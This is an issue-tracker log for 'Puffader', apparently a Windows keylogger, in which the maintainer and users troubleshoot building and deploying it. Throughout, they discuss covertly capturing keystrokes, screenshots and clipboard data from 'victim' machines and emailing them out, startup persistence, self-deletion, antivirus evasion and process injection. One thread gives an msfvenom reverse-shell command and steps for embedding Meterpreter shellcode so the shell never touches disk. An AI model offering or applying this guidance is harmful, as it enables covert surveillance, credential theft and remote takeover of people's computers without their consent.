[2017-09-17 22:23] xp4xbox opened #1 "Add Ability To FTP Logs"

[2017-09-19 01:42] #1 closed, assigned to xp4xbox

[2017-09-19 01:42] xp4xbox commented on #1
ed78410

[2017-09-21 01:13] xp4xbox opened #2 "Removing Persistence Will Not Delete File If Its Running"
An easy fix would be:
```Stop-Process -processname filename```

[2017-09-21 01:52] #2 closed, assigned to nobody

[2017-09-21 22:32] xp4xbox opened #3 "Passing text file as argument into compiled .exe doesnt work."

[2017-09-21 23:03] #3 closed, assigned to nobody

[2017-09-21 23:03] xp4xbox commented on #3
Turns out it was another issue.

[2017-09-21 23:47] xp4xbox opened #4 "Issue with PyInstaller"
PyInstaller keeps two processes open as well errors out when the program is opened multi times.

[2017-09-23 21:06] xp4xbox commented on #4
Problem was when program was compiled to one file .exe.

[2017-09-23 21:06] #4 closed

[2017-09-24 17:11] xp4xbox opened #5 "Feature: Add external ip to email subject."

[2017-09-24 18:35] #5 closed, assigned to xp4xbox

[2017-09-24 22:08] xp4xbox opened #6 "Port/Move code over to python2.7"
This would be good, as the official pyhook module performs much better than the unofficial ones.

[2017-09-24 22:42] #6 closed, assigned to nobody

[2017-09-28 23:14] xp4xbox opened #7 "Feature: Add Click Logger"

[2017-09-28 23:14] xp4xbox opened #8 "Feature: Add Ability To Capture Screenshots."

[2017-10-01 17:59] xp4xbox opened #9 "Improve issue layout"

[2017-10-01 18:00] xp4xbox opened #10 "Add code of conduct"

[2017-10-01 18:01] xp4xbox opened #11 "Add command line options."

[2017-10-01 18:03] xp4xbox opened #12 "Feature: Inject Puffader into another process"

[2017-10-01 20:01] ivailo-stoianov commented on #11
Will submit a PR soon.

[2017-10-01 20:45] salilgupta2510 commented on #9
@xp4xbox  hey what i the requirement exactly?

[2017-10-01 22:00] xp4xbox commented on #9
@salilgupta2510 i have already received pull for this.

[2017-10-01 22:00] #9 closed, assigned to nobody

[2017-10-01 22:43] vaibhavsingh97 commented on #10
I will fix this issue 😄

[2017-10-01 23:37] #10 closed, assigned to nobody

[2017-10-02 00:48] rivermont commented on #11
Which options should be possible via command line?

[2017-10-02 01:25] xp4xbox commented on #11
@rivermont Right now, -s, --startup for making the script run at startup under HKCU. -r --remove, for removing startup. -o, --Open, for opening text file with the program.

[2017-10-02 01:50] xp4xbox opened #16 ""Keylogger started at" should be only printed"
#### OS: [eg. Windows 10]
#### Commit [eg. b227928]

Explanation of the issue:

[2017-10-02 01:50] xp4xbox opened #17 ""Keylogger started at" should be only outputted once."

[2017-10-02 01:53] xp4xbox commented on #16
Duplicate

[2017-10-02 01:53] #16 closed, assigned to nobody

[2017-10-02 19:25] #11 closed, assigned to nobody

[2017-10-02 19:32] #7 closed, assigned to xp4xbox

[2017-10-02 19:36] #8 closed, assigned to xp4xbox

[2017-10-02 20:10] xp4xbox opened #18 "Compiling to exe doesnt work with 86cfe5c"

[2017-10-03 19:24] ymengesha commented on #12
HI,
can you please further elaborate on the intended feature?

[2017-10-03 19:36] xp4xbox commented on #12
I would like to be able to convert this script into a dll which can be ran from memory.

[2017-10-03 23:01] #18 closed, assigned to xp4xbox

[2017-10-03 23:44] #17 closed, assigned to xp4xbox

[2017-10-03 23:48] xp4xbox opened #19 "Allow program to be built using cx_freeze"
Adding compiling instructions for cx_freeze would be nice to offer an alternative over py2exe.

[2017-10-04 00:41] xp4xbox opened #20 "Persistence currently does not work."

[2017-10-04 00:54] xp4xbox commented on #20
caused by having wx9popen.exe in the same directory.

Since this code here:
`$strFileName  = get-childitem -Filter *.exe $WINDIR\$strFileDir`

`$strFilePath = $strFileName.FullName`

looks for all .exe which was used when singlefile was used.

[2017-10-04 01:06] modelorona commented on #19
Let me take a look at this.

[2017-10-04 19:59] #20 closed, assigned to xp4xbox

[2017-10-06 01:06] xp4xbox commented on #12
I have found a solution for this, instead of injecting the dll into memory, migrating the compiled .exe into a windows process accomplishes the same task.

[2017-10-06 16:20] xp4xbox commented on #19
Closed ab37e11

[2017-10-06 16:20] #19 closed, assigned to nobody

[2017-10-06 18:01] xp4xbox commented on #12
I created a basic injector 7f64dd6.

Although I cannot get it to work for the compiled keylogger.

[2017-10-06 20:22] xp4xbox opened #22 "Feature: Inject shellcode to run Puffader in another process"
From #12

It would be a good idea to inject shellcode in a windows application to run the keylogger. https://github.com/xp4xbox/Puffader/blob/master/code_injector/code_injector.py

Currently the shellcode kills the process.

[2017-10-06 20:22] #12 closed, assigned to nobody

[2017-10-07 02:38] MCavros opened #23 "Question"

[2017-10-07 02:39] MCavros commented on #23
Do you need to download everything or only the program

[2017-10-07 14:08] xp4xbox commented on #23
You need to install all the prerequisites in order to be able to compile the program to a standalone executable which can then be ran anywhere.

[2017-10-09 13:39] #23 closed, assigned to nobody

[2017-10-09 21:03] xp4xbox opened #24 "Feature: Add Plugin For Meterpreter Shell"
Using the code_injector as source, a useful ability would be to inject meterpreter reverse tcp raw shell code into the program when it is compiled as a .exe.

[2017-10-09 21:03] xp4xbox commented on #22
I have came up with a better idea for use with the code_injector tool. #24

[2017-10-09 21:03] #22 closed, assigned to nobody

[2017-10-11 19:36] #24 closed, assigned to xp4xbox

[2017-11-09 01:02] xp4xbox opened #25 "Set all threads to be daemon"
Instead of doing os._exit() a more gracious approach would be setting all threads to be daemon.

[2017-12-09 22:16] xp4xbox commented on #25
Turns out it would not work with pythoncom.

[2017-12-09 22:16] #25 closed, assigned to nobody

[2018-01-24 11:15] tehseensagar opened #26 "compile issue"
Widows 8.1
Python 2.7
lasted files from github

When compiling exe getting following error
Missing modules:
? AppKit imported from pyautogui._pyautogui_osx
? Carbon imported from plistlib
? Carbon.File imported from plistlib
? Carbon.Files imported from plistlib
? FCNTL imported from Xlib.support.unix_connect
? ICCProfile imported from PIL.PngImagePlugin
? MacOS imported from platform
? PIL._imagi

[2018-01-24 16:26] xp4xbox commented on #26
Are you using cx_freeze or py2exe?

[2018-01-25 04:38] tehseensagar commented on #26
I'm using python cx_freeze_setup.py build but I do have py2exe as well , shell I use py2exe to avoid these errors.

Further more I don't understand how to make it persistence . Do I need to put persistence.ps1 in root directory where setup.py and Puffer.py is located.

Following message seen when compiling using py2exe

`The following modules appear to be missing
['AppKit', 'ICCProfile', 'PIL._ima

[2018-01-25 16:42] xp4xbox commented on #26
I have been meaning to improve and simply this project for a while now. I am gonna make some changes to the project tomorrow.

[2018-01-26 04:47] tehseensagar commented on #26
@xp4xbox  greate and also simplify the persistence method as well just a config based set it to true it will add it on path such as "C:/Users/%username%/AppData" . Hope to hear from you further more I will test the updated version once you fixed the bug.

Regards

[2018-01-26 18:42] xp4xbox opened #27 "Feature: Option for self-destruct date"

[2018-01-26 18:44] xp4xbox commented on #26
Ok, so I updated the rep. So you can nuke persistence, if you want program to start up, just simply set the new option blnAddToStartup to True. Also I updated the setup.py, so when you compile the program, it will create standalone exe.

[2018-01-26 18:48] xp4xbox commented on #26
Also, I just built the program and I have the same message. I ran it, and it worked fine, so you can just ignore that message. If you have any problems let me know.

[2018-01-26 18:49] #26 closed, assigned to nobody

[2018-01-27 01:19] xp4xbox opened #28 "Remove option for backspace to remove previous character in log file"
If the output is [tab], etc it will remove only the ].

[2018-01-27 09:28] tehseensagar opened #29 "userpath issue in windows"
I've been trying to set path as

C:\Users\%username%\AppData\Local\Microsoft <== does not work out

Actual-user
-------------
C:\Users\michael\AppData\Local\Microsoft <== hard coded username worked

I don't want that path to be hard coded , all I want is to set the path for any user I.E C:\Users\abc\AppData\Local\Microsoft  or like C:\Users\xyz\AppData\Local\Microsoft and rest of the path remain s

[2018-01-27 23:38] xp4xbox commented on #29
In python to use environment variables you have to do something like username = os.environ["USERNAME"].

For the email issue, i have just tested it out, works fine. I would double check your settings, make sure you don't have any conflicting settings.

For the py2exe problems, I have never gotten that error before, I would just try again.

[2018-01-27 23:45] #28 closed, assigned to nobody

[2018-01-28 00:03] xp4xbox commented on #29
Also you can only choose one method for storing/sending logs, default is by email. So if you want to store logs local and send them, there will be a conflict.

[2018-01-29 04:31] tehseensagar commented on #29
My email setting
------------------
strEmailAc = "xxxxx@gmail.com"
strEmailPass = "Passwd"

Further settings:
-----------------

`blnFTP = "False"  # if using ftp set this to True and configure the options below
strFtpServer = ""
intFtpPort = 21
strFtpUser = ""
strFtpPass = ""
strFtpRemotePath = "/"

intCharPerSend = 10  # set num of chars before send log/store (1000)

blnUseTime = "False"  # if y

[2018-01-29 08:25] tehseensagar opened #30 "Av detection"
I sort out the issue is Antivirus it is detecting the signature of binary which cause the following error

Insufficient system resources exist to complete the requested services

Can you please help me to fix this for binary , I've tried to add version , file description and name but didnot help .

Also diagnose an issue , once you turned off you internet process killed it self which is very stran

[2018-01-29 13:36] xp4xbox commented on #29
You have to set `blnStoreLocal` to false to use email. Also the way you set it up now, you will be receiving emails every 10 characters for `intCharPerSend`. If there is no internet then then the program will exit which is why I added the ability for it to be run at startup. For username it should be `"C:/Users/"
+username+"/AppData/Local/Microsoft/Inteldat.txt"`

[2018-01-29 13:43] xp4xbox commented on #30
I cannot sign the binary since I would need to apply for one by Microsoft. Adding version, file description, etc, would not do anything to sign it. Currently the program has a 2/56 detection rate by antivirus which is pretty much the best you can get. Once I have some time I will add this feature.

[2018-01-30 06:24] tehseensagar commented on #30
@xp4xbox  thank you for your prompt response. But there is a bug which cause process to die when there is no internet available. Could you please fix that issue. AV bypass I will manage it .

Regards

[2018-01-30 17:11] xp4xbox commented on #30
Its not a bug, I made it that way. But I can improve it. I will do that sometime soon.

[2018-01-31 07:20] tehseensagar commented on #30
@xp4xbox  could you please share your linkedin / gmail / skype address.

Thanks

Regards

[2018-01-31 08:42] tehseensagar commented on #30
@xp4xbox  could you please share your linkedin / gmail / skype address.

Thanks

Regards

[2018-01-31 13:55] xp4xbox commented on #30
Why

[2018-01-31 18:50] xp4xbox commented on #30
Why do you want my email? Anyway I made an improvement just now, so the program will not exit if there is no internet.

[2018-01-31 18:51] #29 closed, assigned to nobody

[2018-02-01 19:58] erman-dev opened #31 "Detected by ESET Endpoint Antivirus"
The virus was detected by ESET Endpoint Antivirus as a Trojan:Keylogger. Is there a way around that ? :)

[2018-02-01 22:08] xp4xbox commented on #31
No, unfortunately the program is only undetectable by static analysis, not dynamic which is why a few antivirus can catch it.

[2018-02-02 07:21] tehseensagar commented on #30
@xp4xbox great well to share email or linkedin profile to be in touch with such a nice person so I may increase and share idea :).

Regards

[2018-02-02 13:59] tehseensagar opened #32 "Copy and Paste Issue"
I found out that copy and paste data does not seem to work. It does not monitor the clipboard data.

Regards

[2018-02-02 19:32] xp4xbox commented on #32
I never created an option for this.

[2018-02-02 19:33] xp4xbox commented on #30
If you give me your email, I will send you my email.

edit: closing this for now, if you want to give me your email, just add a comment.

[2018-02-02 19:33] #32 closed, assigned to nobody

[2018-02-03 05:10] tehseensagar commented on #32
oh I thought it does have this feature as well. It would be great if implement.

Regards

[2018-02-03 07:42] joker8989 opened #33 "Protonmail"
Hey i guess protonmail is the best email for using for keylogging : the data is encrypted and no one reads my mails..
In gmail account they can add me to black list or block my account if they read it..
I have not test it yet but does the script Puffader send the logs to protonmail? For me its more safe then using gmail yahoo or other emails...

Is this will work?
https://protonmail.com

[2018-02-03 13:39] xp4xbox commented on #33
Currently it only works with gmail, but the program uses SSH when sending the logs, so it is very secure. The way the program works, you enter your email and password, so what the program does is **send an email to yourself** using your email so that it is not possible to black list it.

[2018-02-03 17:20] #31 closed, assigned to nobody

[2018-02-04 21:06] joker8989 opened #34 "convert to exe issue"
I tried to convert the puffader.py file to exe file to run in any windows machine the problem is cx_freeze_setup i run the command : python "cx_freeze_Setup.py" build and it created a exe file :)
but when i run the exe file from the file location(i put him for example in desktop)
i get an error (in a small windows) :
cx_freeze Fatal Error

"cannot get zipimporter instance"
maybe u can help me?

i

[2018-02-04 21:14] xp4xbox commented on #34
I removed cx_freeze since py2exe is the best option. Did you try the program without converting to .exe? It should not have outputted that.

[2018-02-04 21:25] joker8989 commented on #34
yea i tried the program without converting it works well...
py2exe is not so good try numbers and symbols there r not showing in the email (numbers at right side of the keyboard not the numbers where are : !@#!$!%%!)
it show me just letter(py2exe)

[2018-02-04 22:11] joker8989 commented on #34
what do you mean by "i removed cx_freeze ...." add cx_freeze again and see the difference...
you gotta help me with this error pls:...
cx_freeze Fatal Error

"cannot get zipimporter instance"

[2018-02-05 09:36] tehseensagar commented on #34
py2exe work great with out any issue on windows just make sure you have installed all required dependencies for Puffader.

pip install pyautogui
pip install py2exe

download pywin32 and pyhook bindary for python 2.7

for binary file using py2exe
----------------------------
python setup.py

[2018-02-05 09:39] tehseensagar opened #35 "Request for clipboard monitoring"
It would be great if implement clip board monitoring.

Regards

[2018-02-05 13:39] joker8989 commented on #34
I noticed after i posted my last post the i have not set something right and i succeeded thankx anyway..

[2018-02-05 20:01] #30 closed, assigned to nobody

[2018-02-05 20:02] #33 closed, assigned to nobody

[2018-02-05 20:05] xp4xbox commented on #34
I removed support for cx_freeze since I do not like how it cannot compile program to standalone executable. Also instead of copying just modules that are needed over for the program, it copies every single one, even ones that are not in use.

I also do not have much experience with it, so I cannot really help anyone with it.

thanks @tehseensagar

[2018-02-05 20:05] #34 closed, assigned to nobody

[2018-02-05 20:06] xp4xbox commented on #35
I will add this feature soon.

[2018-02-08 05:49] tehseensagar commented on #35
@xp4xbox thank you so much . I will be waiting for this.

[2018-02-08 12:58] joker8989 opened #36 "Webcam"
Hey i started to learn python so for now i can't do it along...
It will be nice if the script taking webcam stream on the victim machine like screebshot and send it to email/ftp server...

What it mean in stepa for example :
1. Check if the camera connected every 5 minutes
2. Streaming webcam for 10 min(you can choose the number of minutes like taking screenshots)
3.save the file in the victim mac

[2018-02-08 19:44] xp4xbox commented on #36
I have already included the ability to take webcam snapshots in my python backdoor. In order to keep this program simplistic I would not include that feature.

[2018-02-08 21:02] #35 closed, assigned to nobody

[2018-02-08 22:46] bananapong opened #37 "Spanish keyboard problem"
Hi! your program is very useful but have a problem with spanish keyboards when i try to write á my keyboard send ´´ and i can´t write the á unless i press it at the same time, how fix it?

[2018-02-08 23:01] xp4xbox commented on #37
This program does not have support for other languages other than english. It is not possible currently to add this support since the module 'pyhook' which this program uses does not support it.

[2018-02-08 23:01] #37 closed, assigned to nobody

[2018-02-09 20:57] kaobajagi opened #38 "Logging Clipboard error"
OS: Windows

This error occurred when running the .exe after compilation during testing.

Exception in thread Thread-3:
Traceback (most recent call last):
  File "threading.pyc", line 801, in __bootstrap_inner
  File "threading.pyc", line 754, in run
  File "Puffader.py", line 106, in MonitorClipboard
TypeError: Specified clipboard format is not available

[2018-02-09 22:42] xp4xbox commented on #38
Probably because of copying a picture or a file.

[2018-02-09 22:51] #38 closed, assigned to nobody

[2018-02-10 11:46] joker8989 opened #39 "100 FUD%"
hey so i have found a "crypter" (NXCRYPT) in github that's make py file FUD i tried it on MSFVENOM-metasploit and it's worked 0/57 (without convert it to exe) i tried the same thing in Puffader and tried to change it to exe now when i converted it with py2exe i got an error:

TypeError: compile() expected string without null bytes

maybe this is the way to make this script FUD in exe....

https://

[2018-02-12 02:42] xp4xbox commented on #39
I tried it out, the program ran fine without compiling it. I am not sure why py2exe wont compile it. I am guessing since the program basically encrypts the program with gibberish text that it cant read.

[2018-02-12 08:53] tehseensagar opened #40 "Little imporvment request"
First once exe run it should allow to delete from the path it run

For example if it is run form D:\puf\puf.exe  after execution it may be able to delete it or it should be melt by itself.

Second thing if any error occurred if should make a log in temp folder rather then on current path from where it is executed. For example D:\puf\

Thrid thing if Internet is off it does not killed but if any fi

[2018-02-12 08:57] tehseensagar commented on #39
@joker8989  , well do not use that NXCrypt is does not work for now , Ive gone through the source file after  crypt. NX just added some junk paragraph in file and that does not understand by py2exe.  I'm also working on it to make it FUD once I succeeded I will share it. For now just hold on and keep try  other methods and share your views.

Regards

[2018-02-12 10:09] tehseensagar opened #41 "some error screen log"
Exception in thread Thread-5:
Traceback (most recent call last):
  File "threading.pyc", line 801, in __bootstrap_inner
  File "threading.pyc", line 1073, in run
  File "svchost.py", line 224, in TakeScr
  File "pyscreeze\__init__.pyc", line 312, in _screenshot_win32
  File "PIL\ImageGrab.pyc", line 41, in grab
IOError: screen grab failed

Exception in thread Thread-16:
Traceback (most recent call

[2018-02-12 11:20] joker8989 commented on #39
I am just now trying to convert it to exe with the NXcrypt maybe i i will succeed , but with this junk code can be make python file FUD...?? am i wrong? its like a crypter in RAT..??

anyway @tehseensagar do u have a skype/email?

[2018-02-12 14:58] joker8989 opened #42 "not an issue ( just for contact )"

[2018-02-12 15:09] #42 closed, assigned to nobody

[2018-02-12 16:28] xp4xbox commented on #40
1. I like this, I will add it soon.
2. I suggested adding the line 'sys.stderr = None' in the program to prevent any errors from showing since it is not possible to change location of file generated by py2exe (at least that I know of).
3. The way it is now, screenshots are of less priority so they will not be sent. I might consider fixing this.

[2018-02-12 20:14] tehseensagar opened #43 "an other issue found"
I have build an exe on my laptop and port that exe to my desktop and ran it there. It ran with out any issue on my desktop pc , but it does not send any data on email nor creating any logs or screen shot in TMP directory as it is stand alone single binary file . Could you please have a look into this issue.

Regards

[2018-02-13 05:01] tehseensagar commented on #39
@joker8989 contact me scorpoin@outlook.com

[2018-02-14 20:24] tehseensagar commented on #43
@xp4xbox  brother any update on bug fix.

[2018-02-14 21:45] xp4xbox commented on #43
I have no information on this issue. The program is currently running fine for me. Check to see if the program is running in task manager.

[2018-02-15 11:35] ghost opened #44 "Cannot close and send keylogs."
Hi,

I got error when I use py2exe to compile so I use pyInstaller instead without any problem.

My problem is:
When I run the exe file, it launches and starts sending screen shot every 120 seconds as default. But I do not receive any keylog even if I reduced 1000 chars to 200. No matter how many times I tried it didn't work out.

Second issue is to close Puffader with key combination of ctrl+righ

[2018-02-15 11:38] tehseensagar commented on #44
dear share your initial config , try to reduce it to 50 instead of 200.

Regards

[2018-02-15 11:40] tehseensagar opened #45 "strage error"
error: [Errno 2] No such file or directory: 'libopenblas.UWVN3XTD2LSS7SFIFK6TIQ5
GONFDBJKU.gfortran-win32.dll'

No idea

Regards

[2018-02-15 11:40] ghost commented on #44
Dear @tehseensagar

I already set Gmail as mentioned so I can receive screenshots via email. I just cannot receive keylogs on time.

And key combination to close Puffader does not work for me.

Regards

[2018-02-15 11:46] ghost commented on #44
OK, I understand what happens:

When I first launched my exe file, intCharPerSend was set to 1000.
Then I used the key combination to close Puffader and assumed it closed.
I change intCharPerSend to 200, compiled and run the program again. Tried typing over 200 letters and when I did not receive keylogs, I assumed it doesn't work but I have just received an e-mail with 2000+ chars.

My issue remai

[2018-02-15 20:24] xp4xbox commented on #43
Also, what OS are you running.

[2018-02-15 20:25] xp4xbox commented on #41
Does this still happen? I think what happened is that the screenshot could not be taken for some reason.

[2018-02-15 20:33] xp4xbox commented on #44
Try latest commit @corefinding for the program not stopping.

[2018-02-16 08:40] tehseensagar commented on #45
I've removed python completly and re-install it with its require libraries needed by Puffader.

It's working fine. Closed it.

[2018-02-16 08:40] tehseensagar commented on #45
I've removed python completly and re-install it with its require libraries needed by Puffader.

Compile it with Pyinstaller it work great . But yet with py2exe still having issue and above error ocured.

Regards

[2018-02-16 10:10] tehseensagar commented on #40
@xp4xbox  thank you so much for adding melt functionality. I've little confusion , correct me if I'm wrong. Application have intTimePerSend = 60 and intCharPerSend = 500 , in this particular setting logs will be send in every 1min right but keylog will be sent once it reaches to 500 keystroke right? once it reaches to 500 log created but internet disconnected and pc is shutdown? will it send log f

[2018-02-17 05:08] tehseensagar commented on #45
Issue is resolve , I was working an other stuff where I installed numpy , scapy as well. due to these packages above error occurred. I've changed the path and now every thing set back to normal. If any one else having this issue so kindly check your windows path at %appdata%  in Roaming folder python rename it for a while and recompile Puffader.py file with python setup.py . It will work for sure

[2018-02-17 05:08] #45 closed, assigned to nobody

[2018-02-17 05:11] tehseensagar commented on #43
I've found out some thing that will help this , I think issue is detection. Windows 10 even built AV security essential detecting it .

@xp4xbox  I would suggest to make some changes to avoid those detection.

Regards

[2018-02-17 05:11] #43 closed, assigned to nobody

[2018-02-18 18:18] joker8989 opened #46 "bind the puffader with reverse shell"
Hey i wanted to know if someone know how to bind the puufader keylogger with a reverse shell (get full access to the system - don't ask me why use reverse) and the keylogger is for keystrokes from every client/bot/slave i get...

the big problem is when i try to bind files is that AV runs 15 seconds of scans file (so the victim does need to be smart that he has been hacked.. )

[2018-02-19 03:25] xp4xbox commented on #46
Check the readme. I included instructions for a undetectable meterpreter shell since it injects the shellcode into puffader itself, so the actual reverse shell never touches disk.

[2018-02-19 03:26] xp4xbox commented on #44
I am guessing the issue is resolved.

[2018-02-19 03:26] #39 closed, assigned to nobody

[2018-02-19 03:45] xp4xbox commented on #40
@tehseensagar If you set `blnUseTime` to be True, then it will override intCharPerSend. If the PC is shutdown the program is killed by the os, so any logs will be lost. Il try to get to that eventually for the feature.

[2018-02-19 03:47] xp4xbox commented on #41
@tehseensagar If not, I will close the issue as I think this was just a one-time bug.

[2018-02-19 05:49] joker8989 commented on #46
Ohh ty did not notice..

[2018-02-19 05:54] joker8989 commented on #46
But will the puffader run on the victim system i know myself how to create FUD py file (or meterpreter)???

[2018-02-19 14:36] xp4xbox commented on #46
Yeah it will.

[2018-02-19 16:23] joker8989 commented on #46
Hey man i have some issues with set  this up :
1.  run : msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d  LPORT=4444 -f c
2. copy the shellcode to "base64encoder.py"
3. i run "base64encoder.py"
4. paste in "Puffader_Code_Addition.py" what's print in "base64encoder.py"
5. run "Puffader_Code_Addition.py"

the file that's created is pyc and can't convert to exe ... (i think the error: compile():s

[2018-02-19 17:02] xp4xbox commented on #46
You don't run Puffader_Code_Addition. Did you make sure to move the code_injector module to same dir when compiling?

Your puffader.py should look something like this:

[code]

[2018-02-19 17:18] joker8989 commented on #46
Yep there r in the same location  (like i downloaded it) puuf_code_addion and code_injector r in the same place...
But did i type it right?

msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

Can u please tell me the steps how to do it its not clear in the readme :(

[2018-02-19 17:41] xp4xbox commented on #46
yeah the msfvenom command is right. the puffader_code_addition is just the code that needs to be added to the actual puffader.py. You dont need a pyc file. Py2exe will automatically include the code_injector module as long as its in the same dir.

[2018-02-19 17:42] xp4xbox commented on #46
Can you show me your puffader.py code?

[2018-02-19 17:45] joker8989 commented on #46
Yea when i ll back home like in 2 hours..

[2018-02-19 20:29] joker8989 commented on #46
ok so what did i do : (before pasting the puffader.py code)
1. generate shellcode :
msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

2. run base64encoder.py with the shellcode inside...

3. move the all files in the same dir

4. paste the puufader_code_addional.py to puffader.py between function hide and function getEXip..

what's generated from base64encoder.py is :
python bas

[2018-02-19 23:52] xp4xbox commented on #46
I just built it with no problems.

btw instead of  `windows/shell_reverse_tcp`,  `windows/meterpreter/reverse_tcp` is better.

[2018-02-20 00:26] xp4xbox commented on #40
Also according to py2exe you can set the path for the log by doing sys.stderr = PATH.

[2018-02-20 06:00] joker8989 commented on #46
And u got a connection from the client?
I will look at this soon very strange i am glad to hear that's it only for me not working...

i succeded i created exe file with pyinstaller with meterpreter/reverse_tcp ....

but i dont get a connection i execute the program set in the msfconsole all i need and nothing...

i get always "the program sttoped working"

can someone help me? i get always

"file.

[2018-02-20 06:15] tehseensagar commented on #40
@xp4xbox  thank for your prompt response. Well setting local path will not send logs to any where I guess? It will keep them on system.

Regards

[2018-02-20 07:41] joker8989 commented on #46
i succeded i created exe file with pyinstaller with meterpreter/reverse_tcp ....

but i dont get a connection i execute the program set in the msfconsole all i need and nothing...

[2018-02-20 08:56] joker8989 commented on #46
i get always "the program sttoped working"

[2018-02-20 12:26] joker8989 commented on #46
can someone help me? i get always

"file.exe has stopped working"

tried to convert with pyinstaller and py2exe... did someone get a connection from the puufader file that include meterpreter plugin?

[2018-02-20 18:51] joker8989 commented on #46
Do u have skype ? It will be more easier to resolve the problem...

[2018-02-20 19:35] xp4xbox commented on #46
Next time edit your comments as one. For msfconsole did you make sure to type:
[code]

I don't have skype unfortunately, but I have your email.

[2018-02-20 19:38] xp4xbox commented on #40
It will keep them on the system.

[2018-02-20 19:52] joker8989 commented on #46
Of course i did it... except setExitSession false
So send me a email to have u and i will send u avideo or something its will be more easy..

but its not explaning the reason that the "program has stopped working...."

@xp4xbox what's your email?

[2018-02-22 07:14] netm4li commented on #44
@xp4xbox sorry for my late reply due to business travel for four days.

I downloaded the Puffader again and compiled it via pyInstaller with the settings below:

`blnFTP = "False"  # if using ftp set this to True and configure the options below`
`strFtpServer = ""`
`intFtpPort = 21`
`strFtpUser = ""`
`strFtpPass = ""`
`strFtpRemotePath = "/"`

`intCharPerSend = 200  # set num of chars before send

[2018-02-22 07:17] ghost commented on #44
@xp4xbox sorry for my late reply due to business travel for four days.

I downloaded the Puffader again and compiled it via pyInstaller with the settings below:

`blnFTP = "False"  # if using ftp set this to True and configure the options below`
`strFtpServer = ""`
`intFtpPort = 21`
`strFtpUser = ""`
`strFtpPass = ""`
`strFtpRemotePath = "/"`

`intCharPerSend = 200  # set num of chars before send

[2018-02-22 19:14] xp4xbox commented on #44
Maybe, try running without compiling. I am using those settings with no problem.

[2018-02-22 19:15] #46 closed, assigned to nobody

[2018-02-23 01:17] #41 closed, assigned to nobody

[2018-02-23 10:05] ghost commented on #44
@xp4xbox I tried it just by running Puffader.py and still not working.

Is there anything I can try?

[2018-02-23 10:55] tehseensagar commented on #40
My concern is that a feature must be define which check any file letf over in system it must sent it back to server , if your setting is set to email.

Regards

[2018-02-24 05:06] tehseensagar commented on #44
First of all I would suggest you to have a look on these variable settings as per below

intCharPerSend = 100 # set num of chars before send log/store

blnUseTime = "False" # if you prefer to use a timer to send/save logs, set this to True
intTimePerSend = 60 # set how often to send/save logs in seconds
strLogFile = ""

And also let us know either you are trying to send logs via email or not.

try

[2018-02-25 01:34] xp4xbox commented on #40
Im working on it.

[2018-02-27 07:44] tehseensagar commented on #40
@xp4xbox  thanks dear , I will be waiting for it :).

[2018-02-27 19:56] Destronuck opened #47 "Convert to exe not working"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

I have the code in python and set up as a .py file. But when I run it the dist folder pops up but there's nothing in it.

[2018-02-27 20:56] xp4xbox commented on #47
First update to the latest commit, then if you still have problems post what it says in cmd.

[2018-02-28 19:13] tehseensagar commented on #47
py2exe work great with out any issue on windows just make sure you have installed all required dependencies for Puffader.

pip install pyautogui
pip install py2exe

download pywin32 and pyhook bindary for python 2.7

for binary file using py2exe
----------------------------
python setup.py

[2018-03-01 18:40] Destronuck commented on #47
Okay I've gotten it to work by downloading the master zip file (that I didn't know existed,) but there's an .exe called w9xpopen. Do I need this file or am I fine with just the puffader exe?

[2018-03-01 18:44] joker8989 opened #48 "Persistence"
Hey i have some problems with persistence first of all how can i make sure that the meterpreter will back to me when ever i want..(hiw to make persistence)?

Second when i am not connected to the victim via meterpreter the puffader code does not work and does not send the logs to email ( or the meterpreter and puffader work together or they r just dont work..)

Any ideas?

For the second thing i t

[2018-03-01 19:37] xp4xbox commented on #47
You don't need it. For some reason py2exe bundles it on some systems.

[2018-03-01 19:37] #47 closed, assigned to nobody

[2018-03-01 19:38] xp4xbox commented on #36
I will close this for now.

[2018-03-01 19:38] #36 closed, assigned to nobody

[2018-03-01 21:14] xp4xbox commented on #40
Closed 16dd47b

[2018-03-01 21:14] #40 closed, assigned to nobody

[2018-03-02 13:25] joker8989 commented on #48
Ok so i converted the puffader again with the persistence file and it worked i get puffader back when restart BUT i dont get the meterpreter session when i do that.. only when i restart the victim machine and the attacker listening...

So the meterpreter does not work ...
Just the puffader itself...(logs sends to email)

How can i make sure to reconnect to the victim when ever i want? (Even if the

[2018-03-02 19:36] #48 closed, assigned to nobody

[2018-03-12 00:22] xp4xbox commented on #44
I will keep this open for 1 more week.

[2018-03-20 18:35] #44 closed, assigned to nobody

[2018-04-06 22:48] ArlenRicard opened #49 "Logging keyboard error."
I compiled the file, and I'm running the test on local computer, and configured to save the logs to a file. Recompiling a script multiple times after the problem, but the same error persisted in all tests, and no log file was generated.
The following tests are performed on virtual machines on the Windows 10 and Windows 7 operating systems. The following error is displayed by the Puffader log:

`Ex

[2018-04-06 22:50] xp4xbox commented on #49
I have seen this before, for some reason it is passing in all of the characters as arguments.

[2018-04-06 23:12] xp4xbox commented on #49
Try the latest commit.

[2018-04-06 23:26] ArlenRicard commented on #49
Both of the virtual machines I used for the test are clean. I have installed only the pr requirements necessary to compile the project. I even installed everything software to do a quick search on the machine for this executable spbkhost.exe, but it does not exist.

[2018-04-07 03:15] ArlenRicard commented on #49
@xp4xbox thanks for the speed in solving the problem!
The last commit, solved my problem, thank you!

[2018-04-08 00:48] #49 closed, assigned to nobody

[2018-04-09 19:17] ArlenRicard opened #50 "Problem when using accent with puffader running."
Problem when using accent with puffader running.

When I initialize the puffader, the graphical accent no longer works correctly in any text editor, microsoft-word, notepad, etc ...
When I try to use the "**ã**" or "**á**" accent, any accent on the letters does not work. It is displayed only in the "**~~**" or "**´´**" or "**^^**" format.
This problem occurs both in the puffader and in the keylogg

[2018-04-10 13:47] ArlenRicard commented on #50
In the log file, the word is stored correctly, however in the text editor it does not.
In countries that use accentuation in writing, the puffader would not do well, since the system administrator would realize this problem that the user would report, and would certainly do a reinstallation of the operating system in order to solve this problem, eliminating the puffader.

[2018-04-10 22:55] xp4xbox commented on #50
This is probably because of the PyHook module that I use and there is really nothing I can do about it.

[2018-04-11 00:05] #50 closed, assigned to nobody

[2018-05-22 04:29] XLuma opened #51 "[HELP] Meterpreter"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

Is Meterpreter needed when compiling ? If yes, how to I generate raw shellcode for that ?

